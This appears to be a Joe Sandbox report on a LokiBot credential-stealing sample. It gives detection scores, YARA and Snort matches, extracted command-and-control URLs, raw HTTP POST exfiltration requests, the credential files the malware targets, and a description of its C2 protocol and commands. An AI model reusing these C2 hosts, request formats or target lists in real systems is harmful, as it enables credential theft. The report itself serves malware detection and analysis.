Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wi7zJOZT2r.exe

Overview

General Information

Sample Name:wi7zJOZT2r.exe
Original Sample Name:3dc7d72c3b38ce465684f96faeaa0ce7.exe
Analysis ID:1283498
MD5:3dc7d72c3b38ce465684f96faeaa0ce7
SHA1:491568fcf9f2e718d587621361b0e82b681c9b8d
SHA256:5388ab765bd614a7350d9ce7126afab89ca2e0b0e55d23e1cd43459cb9bc745d
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged

Classification

  • System is w10x64
  • wi7zJOZT2r.exe (PID: 7088 cmdline: C:\Users\user\Desktop\wi7zJOZT2r.exe MD5: 3DC7D72C3B38CE465684F96FAEAA0CE7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
wi7zJOZT2r.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    wi7zJOZT2r.exeJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      wi7zJOZT2r.exeJoeSecurity_LokibotYara detected LokibotJoe Security
        wi7zJOZT2r.exeINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
        • 0x16536:$f1: FileZilla\recentservers.xml
        • 0x16576:$f2: FileZilla\sitemanager.xml
        • 0x147e6:$b2: Mozilla\Firefox\Profiles
        • 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • 0x146fa:$s4: logins.json
        • 0x155a4:$s6: wand.dat
        • 0x14024:$a1: username_value
        • 0x14014:$a2: password_value
        • 0x1465f:$a3: encryptedUsername
        • 0x146cc:$a3: encryptedUsername
        • 0x14672:$a4: encryptedPassword
        • 0x146e0:$a4: encryptedPassword
        wi7zJOZT2r.exeWindows_Trojan_Lokibot_1f885282unknownunknown
        • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000000.359525035.0000000000401000.00000020.00000001.01000000.00000003.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          00000000.00000002.368819944.0000000002984000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
            00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                Click to see the 11 entries
                SourceRuleDescriptionAuthorStrings
                0.0.wi7zJOZT2r.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.0.wi7zJOZT2r.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                    0.0.wi7zJOZT2r.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                      0.0.wi7zJOZT2r.exe.400000.0.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                      • 0x16536:$f1: FileZilla\recentservers.xml
                      • 0x16576:$f2: FileZilla\sitemanager.xml
                      • 0x147e6:$b2: Mozilla\Firefox\Profiles
                      • 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                      • 0x146fa:$s4: logins.json
                      • 0x155a4:$s6: wand.dat
                      • 0x14024:$a1: username_value
                      • 0x14014:$a2: password_value
                      • 0x1465f:$a3: encryptedUsername
                      • 0x146cc:$a3: encryptedUsername
                      • 0x14672:$a4: encryptedPassword
                      • 0x146e0:$a4: encryptedPassword
                      0.0.wi7zJOZT2r.exe.400000.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                      • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                      Click to see the 11 entries
                      No Sigma rule has matched
                      Timestamp:192.168.2.3216.239.38.2149697802021641 08/01/23-04:47:03.589313
                      SID:2021641
                      Source Port:49697
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149697802024317 08/01/23-04:47:03.589313
                      SID:2024317
                      Source Port:49697
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.32.2149702802825766 08/01/23-04:47:05.661750
                      SID:2825766
                      Source Port:49702
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149697802024312 08/01/23-04:47:03.589313
                      SID:2024312
                      Source Port:49697
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149699802825766 08/01/23-04:47:04.225849
                      SID:2825766
                      Source Port:49699
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149697802025381 08/01/23-04:47:03.589313
                      SID:2025381
                      Source Port:49697
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.32.2149701802825766 08/01/23-04:47:04.869622
                      SID:2825766
                      Source Port:49701
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.32.2149701802024318 08/01/23-04:47:04.869622
                      SID:2024318
                      Source Port:49701
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.32.2149701802021641 08/01/23-04:47:04.869622
                      SID:2021641
                      Source Port:49701
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149700802825766 08/01/23-04:47:04.525369
                      SID:2825766
                      Source Port:49700
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149699802024313 08/01/23-04:47:04.225849
                      SID:2024313
                      Source Port:49699
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149700802024318 08/01/23-04:47:04.525369
                      SID:2024318
                      Source Port:49700
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149698802024317 08/01/23-04:47:03.996311
                      SID:2024317
                      Source Port:49698
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.32.2149702802025381 08/01/23-04:47:05.661750
                      SID:2025381
                      Source Port:49702
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.32.2149701802024313 08/01/23-04:47:04.869622
                      SID:2024313
                      Source Port:49701
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149698802021641 08/01/23-04:47:03.996311
                      SID:2021641
                      Source Port:49698
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149698802825766 08/01/23-04:47:03.996311
                      SID:2825766
                      Source Port:49698
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149699802025381 08/01/23-04:47:04.225849
                      SID:2025381
                      Source Port:49699
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149698802024312 08/01/23-04:47:03.996311
                      SID:2024312
                      Source Port:49698
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.32.2149701802025381 08/01/23-04:47:04.869622
                      SID:2025381
                      Source Port:49701
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149699802024318 08/01/23-04:47:04.225849
                      SID:2024318
                      Source Port:49699
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.32.2149702802024313 08/01/23-04:47:05.661750
                      SID:2024313
                      Source Port:49702
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.32.2149702802021641 08/01/23-04:47:05.661750
                      SID:2021641
                      Source Port:49702
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149700802024313 08/01/23-04:47:04.525369
                      SID:2024313
                      Source Port:49700
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149697802825766 08/01/23-04:47:03.589313
                      SID:2825766
                      Source Port:49697
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149699802021641 08/01/23-04:47:04.225849
                      SID:2021641
                      Source Port:49699
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.32.2149702802024318 08/01/23-04:47:05.661750
                      SID:2024318
                      Source Port:49702
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149700802021641 08/01/23-04:47:04.525369
                      SID:2021641
                      Source Port:49700
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149698802025381 08/01/23-04:47:03.996311
                      SID:2025381
                      Source Port:49698
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3216.239.38.2149700802025381 08/01/23-04:47:04.525369
                      SID:2025381
                      Source Port:49700
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                      Source: wi7zJOZT2r.exeReversingLabs: Detection: 100%
                      Source: wi7zJOZT2r.exeVirustotal: Detection: 88%Perma Link
                      Source: wi7zJOZT2r.exeAvira: detected
                      Source: https://publicspeaking.co.id/cjay/Panel/five/fre.php8Avira URL Cloud: Label: malware
                      Source: https://publicspeaking.co.id/cjay/Panel/five/fre.phpAvira URL Cloud: Label: malware
                      Source: http://publicspeaking.co.id/cjay/Panel/five/fre.phpAvira URL Cloud: Label: malware
                      Source: http://www.publicspeaking.co.id/cjay/Panel/five/fre.phpAvira URL Cloud: Label: malware
                      Source: http://publicspeaking.co.id/cjay/Panel/five/fre.phpVirustotal: Detection: 10%Perma Link
                      Source: publicspeaking.co.idVirustotal: Detection: 16%Perma Link
                      Source: wi7zJOZT2r.exeJoe Sandbox ML: detected
                      Source: wi7zJOZT2r.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49697 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49697 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49697 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49697 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49697 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49698 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49698 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49698 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49698 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49698 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49699 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49699 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49699 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49699 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49699 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49700 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49700 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49700 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49700 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49700 -> 216.239.38.21:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49701 -> 216.239.32.21:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49701 -> 216.239.32.21:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49701 -> 216.239.32.21:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49701 -> 216.239.32.21:80
                      Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49701 -> 216.239.32.21:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49702 -> 216.239.32.21:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49702 -> 216.239.32.21:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49702 -> 216.239.32.21:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49702 -> 216.239.32.21:80
                      Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49702 -> 216.239.32.21:80
                      Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                      Source: global trafficHTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 190Connection: close
                      Source: global trafficHTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 190Connection: close
                      Source: global trafficHTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 163Connection: close
                      Source: global trafficHTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 163Connection: close
                      Source: global trafficHTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 163Connection: close
                      Source: global trafficHTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 163Connection: close
                      Source: wi7zJOZT2r.exeString found in binary or memory: http://www.ibsensoftware.com/
                      Source: wi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php
                      Source: wi7zJOZT2r.exeString found in binary or memory: https://publicspeaking.co.id/cjay/Panel/five/fre.php
                      Source: wi7zJOZT2r.exe, 00000000.00000002.368819944.0000000002977000.00000004.00000020.00020000.00000000.sdmp, wi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://publicspeaking.co.id/cjay/Panel/five/fre.php8
                      Source: unknownHTTP traffic detected: POST /cjay/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 97CBD574Content-Length: 190Connection: close
                      Source: unknownDNS traffic detected: queries for: publicspeaking.co.id
                      Source: C:\Users\user\Desktop\wi7zJOZT2r.exeCode function: 0_2_00404ED4 recv,0_2_00404ED4
                      Source: wi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary

                      barindex
                      Source: wi7zJOZT2r.exe, type: SAMPLEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: wi7zJOZT2r.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: wi7zJOZT2r.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: wi7zJOZT2r.exe, type: SAMPLEMatched rule: Loki Payload Author: kevoreilly
                      Source: wi7zJOZT2r.exe, type: SAMPLEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000000.359525035.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: wi7zJOZT2r.exe PID: 7088, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: wi7zJOZT2r.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: wi7zJOZT2r.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: wi7zJOZT2r.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: wi7zJOZT2r.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: wi7zJOZT2r.exe, type: SAMPLEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: wi7zJOZT2r.exe, type: SAMPLEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.0.wi7zJOZT2r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
